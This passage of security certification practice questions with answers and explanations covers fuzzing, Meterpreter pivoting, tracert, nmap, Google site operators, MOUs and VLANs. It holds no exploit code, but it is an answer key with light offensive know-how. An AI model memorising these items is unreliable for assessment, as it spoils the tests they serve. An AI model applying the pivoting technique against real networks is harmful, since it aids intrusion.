answer is that “someone” performed this SQL injection.

79
Q
A software assurance test analyst performs a dynamic assessment on an application by automatically generating random data sets and inputting them in an attempt to cause an error or failure condition. Which technique is the analyst utilizing?
A.Fuzzing
B.Sequential data sets
C.Static code analysis
D.Known bad data injection
A

A.Fuzzing

Explanation:
OBJ-4.2: Fuzzing is an automated software assessment technique that involves providing invalid, unexpected, or random data as inputs to a computer program. The program is then monitored for exceptions (crashes), failing built-in code assertions, or potential memory leaks. Dynamic code analysis relies on studying how the code behaves during execution. Fuzzing is a specific type of dynamic code analysis, making it a better answer to this question. Static code analysis is a method of debugging by examining source code before a program is run. Known bad data injection is a technique where data known to cause an exception or fault is entered as part of the testing/assessment. With known bad data injections, you would not use randomly generated data sets, though.

80
Q

A penetration tester has exploited an FTP server using Metasploit and now wants to pivot to the organization’s LAN. What is the best method for the penetration tester to use to conduct the pivot?
A.Create a route statement in meterpreter
B.Reconfigure the network settings in meterpreter
C.Set the payload to propagate through meterpreter
D.Issue the pivot exploit and set up meterpreter

A

A.Create a route statement in meterpreter

Explanation:
OBJ-4.2: Since the penetration tester has exploited the FTP server from outside the LAN, they will need to set up a route statement in meterpreter. Metasploit makes this very simple since it also has an autoroute meterpreter script that will allow us to attack this second network through our first compromised machine (the FTP server) and then create the routes needed.

81
Q
You are troubleshooting a network connectivity issue and need to determine the packet's flow path from your system to the remote server. Which of the following tools would best help you identify the path between the two systems?
A.ipconfig
B.nbtstat
C.tracert
D.netstat
A

C.tracert

Explanation:
OBJ-4.2: The TRACERT (trace route) diagnostic utility determines the route to a destination by sending Internet Control Message Protocol (ICMP) echo packets to the destination. In these packets, TRACERT uses varying IP Time-To-Live (TTL) values. When the TTL on a packet reaches zero (0), the router sends an ICMP “Time Exceeded” message back to the source computer. The ICMP “Time Exceeded” messages that intermediate routers send back show the route. The ipconfig tool displays all current TCP/IP network configuration values on a given system. The netstat tool is a command-line network utility that displays network connections for Transmission Control Protocol, routing tables, and some network interface and network protocol statistics on a single system. The nbtstat command is a diagnostic tool for NetBIOS over TCP/IP used to troubleshoot NetBIOS name resolution problems.

82
Q
A software company is meeting with a car manufacturer to finalize discussions. In the signed document, the software company will provide the latest versions of its mapping application suite for the car manufacturer’s next generation of cars. In return, the car manufacturer will provide three specific vehicle analytics to the software company to enhance the software company’s mapping application suite. The software company can offer its enhanced mapping application to other car manufacturers but must pay the car manufacturer a royalty. Which of the following BEST describes the document used in this scenario?
A.SLA
B.MSA
C.AUP
D.MOU
A

D.MOU

Explanation:
OBJ-1.2: MOU is a memorandum of understanding. This is the most accurate description based on the choices given. A memorandum of understanding is a document that describes the broad outlines of an agreement that two or more parties have reached. MOUs communicate the mutually accepted expectations of all of the parties involved in a negotiation. While not legally binding, the MOU signals that a binding contract is imminent.

83
Q

You have conducted a Google search for the “site:diontraining.com -site:sales.diontraining.com financial.” What results do you expect to receive?
A.Google results for keyword matches from the site sales.diontraining.com that are in the domain diontraining.com but do not include the word financial
B.Google results matching “financial” in domain diontraining.com, but no results from the site sales.diontraining.com
C.Google results for keyword matches on diontraining.com and sales.diontraining.com that include the word financial
D.Google results matching all words in the query

A

B.Google results matching “financial” in domain diontraining.com, but no results from the site sales.diontraining.com

Explanation:
OBJ-2.1: When conducting a Google search, using site:AAA in the query will return results only from that website (AAA). If you use -site:AAA, you will get results that are not on the website (AAA). In the case of this question, no results should show up from sales.diontraining.com. All results should only come from diontraining.com.

84
Q

Which of the following command-line tools would you use to identify open ports and services on a host along with the version of the application that is associated with them?

A.Wireshark
B.ping
C.nmap
D.netstat

A

C.nmap

Explanation:
OBJ-4.2: Nmap sends specially crafted packets to the target host(s) and then analyzes the responses to determine the open ports and services running on those hosts. Also, nmap can determine the versions of the applications being used on those ports and services. Nmap is a command-line tool for use on Linux, Windows, and macOS systems. The netstat (network statistics) tool is a command-line utility that displays network connections for incoming and outgoing TCP packets, routing tables, and some network interface and network protocol statistics. Still, it cannot identify open ports and services on a host with their version numbers. The ping tool is used to query another computer on a network to determine whether there is a valid connection. Wireshark is an open-source packet analyzer used for network troubleshooting, analysis, software and communications protocol development, and education.

85
Q
You are working as a network administrator for Dion Training. The company has decided to allow employees to connect their devices to the corporate wireless network under a new BYOD policy. You have been asked to separate the corporate network into an administrative network (for corporate-owned devices) and an untrusted network (for employee-owned devices). Which of the following technologies should you implement to achieve this goal?
A.WPA2
B.VPN
C.MAC filtering
D.VLAN
A

D.VLAN

Explanation:
OBJ-5.3: A virtual local area network (VLAN) is a type of network segmentation configured in your network switches that prevents communications between different VLANs without using a router. This allows two virtually separated networks to exist on one physical network and separates the two virtual networks’ data. A virtual private network (VPN) is a remote access capability to connect a trusted device over an untrusted network back to the corporate network. A VPN would not create the desired effect. WPA2 is a type of wireless encryption, but it will not create two different segmented networks on the same physical hardware. MAC filtering is used to allow or deny a device from connecting to a network, but it will not create two network segments, as desired.